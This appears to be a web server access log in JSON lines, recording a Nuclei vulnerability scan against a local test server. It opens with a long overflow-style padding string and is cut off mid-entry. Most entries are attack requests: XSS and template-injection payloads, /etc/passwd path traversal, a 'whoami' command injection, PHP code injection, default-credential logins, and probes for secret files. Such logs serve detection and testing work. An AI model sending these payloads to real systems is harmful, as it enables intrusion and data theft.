AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.041","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /timesheet/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jsonws/invoke HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/users/search_authors HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"_charset_=utf-8&j_username=author&j_password=author&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.041","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MyErrors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample-apps/hello/%2f/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /BSW_cxttongr.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pentaho/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMA/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aj.html?a=devi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"getpwd=WorldFilledWithLove","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.074","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docker-compose.dev.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"_charset_=utf-8&j_username=anonymous&j_password=anonymous&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /installer-log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"action=login&username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /oauth/token HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /themes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/xml/webuser-auth.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"wsecure_action=update&publish=\x22;} header(\x22Nuclei: CVE-2016-10960\x22); class WSecureConfig2 {var $test=\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/10 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:09 +0000","request_body":"frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cu.html HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; 